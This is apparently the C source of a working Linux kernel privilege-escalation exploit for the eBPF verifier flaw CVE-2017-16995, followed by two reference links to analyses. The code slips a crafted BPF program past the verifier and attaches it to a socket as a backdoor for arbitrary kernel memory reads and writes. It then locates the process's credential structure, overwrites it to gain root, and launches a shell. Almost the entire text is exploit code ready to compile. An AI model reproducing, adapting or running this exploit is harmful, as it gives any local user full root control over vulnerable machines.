#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
((struct bpf_insn) { \
.code = CODE, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = IMM })
#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })
#define BPF_DISABLE_VERIFIER() \
BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), /* r2 = (u32)0xFFFFFFFF */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* if (r2 == -1) { */ \
BPF_MOV64_IMM(BPF_REG_0, 0), /* exit(0); */ \
BPF_EXIT_INSN() /* } */ \
#define BPF_MAP_GET(idx, dst) \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* r1 = r9 */ \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), /* r2 = fp */ \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */ \
BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), /* *(u32 *)(fp - 4) = idx */ \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), /* if (r0 == 0) */ \
BPF_EXIT_INSN(), /* exit(0); */ \
BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0) /* r_dst = *(u64 *)(r0) */
static int load_prog() {
struct bpf_insn prog[] = {
BPF_DISABLE_VERIFIER(),
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16), /* *(fp - 16) = r1 */
BPF_LD_MAP_FD(BPF_REG_9, mapfd),
BPF_MAP_GET(0, BPF_REG_6), /* r6 = op */
BPF_MAP_GET(1, BPF_REG_7), /* r7 = address */
BPF_MAP_GET(2, BPF_REG_8), /* r8 = value */
/* store map slot address in r2 */
BPF_MOV64_REG(BPF_REG_2, BPF_REG_0), /* r2 = r0 */
BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 for exit(0) */
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2), /* if (op == 0) */
/* get fp */
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),
BPF_EXIT_INSN(),
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3), /* else if (op == 1) */
/* get skbuff */
BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
BPF_EXIT_INSN(),
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3), /* else if (op == 2) */
/* read */
BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
BPF_EXIT_INSN(),
/* else */
/* write */
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
BPF_EXIT_INSN(),
};
return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
}
void info(const char *fmt, ...) {
va_list args;
va_start(args, fmt);
fprintf(stdout, "[.] ");
vfprintf(stdout, fmt, args);
va_end(args);
}
void msg(const char *fmt, ...) {
va_list args;
va_start(args, fmt);
fprintf(stdout, "[*] ");
vfprintf(stdout, fmt, args);
va_end(args);
}
void redact(const char *fmt, ...) {
va_list args;
va_start(args, fmt);
if(doredact) {
fprintf(stdout, "[!] ( ( R E D A C T E D ) )\n");
return;
}
fprintf(stdout, "[*] ");
vfprintf(stdout, fmt, args);
va_end(args);
}
void fail(const char *fmt, ...) {
va_list args;
va_start(args, fmt);
fprintf(stdout, "[!] ");
vfprintf(stdout, fmt, args);
va_end(args);
exit(1);
}
void
initialize() {
info("\n");
info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n");
info("\n");
info(" ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n");
info("\n");
redact("creating bpf map\n");
mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
if (mapfd < 0) {
fail("failed to create bpf map: '%s'\n", strerror(errno));
}
redact("sneaking evil bpf past the verifier\n");
progfd = load_prog();
if (progfd < 0) {
if (errno == EACCES) {
msg("log:\n%s", bpf_log_buf);
}
fail("failed to load prog '%s'\n", strerror(errno));
}
redact("creating socketpair()\n");
if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
fail("failed to create socket pair '%s'\n", strerror(errno));
}
redact("attaching bpf backdoor to socket\n");
if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
fail("setsockopt '%s'\n", strerror(errno));
}
}
static void writemsg() {
ssize_t n = write(sockets[0], buffer, sizeof(buffer));
if (n < 0) {
perror("write");
return;
}
if (n != sizeof(buffer)) {
fprintf(stderr, "short write: %d\n", n);
}
}
static void
update_elem(int key, unsigned long value) {
if (bpf_update_elem(mapfd, &key, &value, 0)) {
fail("bpf_update_elem failed '%s'\n", strerror(errno));
}
}
static unsigned long
get_value(int key) {
unsigned long value;
if (bpf_lookup_elem(mapfd, &key, &value)) {
fail("bpf_lookup_elem failed '%s'\n", strerror(errno));
}
return value;
}
static unsigned long
sendcmd(unsigned long op, unsigned long addr, unsigned long value) {
update_elem(0, op);
update_elem(1, addr);
update_elem(2, value);
writemsg();
return get_value(2);
}
unsigned long
get_skbuff() {
return sendcmd(1, 0, 0);
}
unsigned long
get_fp() {
return sendcmd(0, 0, 0);
}
unsigned long
read64(unsigned long addr) {
return sendcmd(2, addr, 0);
}
void
write64(unsigned long addr, unsigned long val) {
(void)sendcmd(3, addr, val);
}
static unsigned long find_sk_rcvtimeo() {
uid_t uid = getuid();
unsigned long skbuff = get_skbuff();
/*
* struct sk_buff {
* [...24 byte offset...]
* struct sock *sk;
* };
*
*/
unsigned long addr = read64(skbuff + 24);
msg("Leaking sock struct from %llx\n", addr);
/*
* scan forward for expected sk_rcvtimeo value.
*
* struct sock {
* [...]
* long sk_rcvtimeo;
* };
*/
for (int i = 0; i < 100; i++, addr += 8) {
if(read64(addr) == 0x7FFFFFFFFFFFFFFF) {
/*if(read64(addr - 24) != uid) {
continue;
}*/
msg("found sock->sk_rcvtimeo at offset %d\n", i * 8);
return addr;
}
}
fail("failed to find sk_rcvtimeo.\n");
}
static unsigned long find_cred() {
/*
* struct sock {
* [...]
* const struct cred *sk_peer_cred;
* long sk_rcvtimeo;
* };
*/
long result = read64(find_sk_rcvtimeo() - 8);
msg("found sock->sk_peer_cred\n");
return result;
}
static void
hammer_cred(unsigned long addr) {
msg("hammering cred structure at %llx\n", addr);
#define w64(w) { write64(addr, (w)); addr += 8; }
unsigned long val = read64(addr) & 0xFFFFFFFFUL;
w64(val);
w64(0); w64(0); w64(0); w64(0);
w64(0xFFFFFFFFFFFFFFFF);
w64(0xFFFFFFFFFFFFFFFF);
w64(0xFFFFFFFFFFFFFFFF);
#undef w64
}
int
main(int argc, char **argv) {
initialize();
hammer_cred(find_cred());
msg("credentials patched, launching shell...\n");
if(execl("/bin/sh", "/bin/sh", NULL)) {
fail("exec %s\n", strerror(errno));
}
}
参考链接
[1]https://dangokyo.me/2018/05/24/analysis-on-cve-2017-16995/
[2]https://security.tencent.com/index.php/blog/msg/124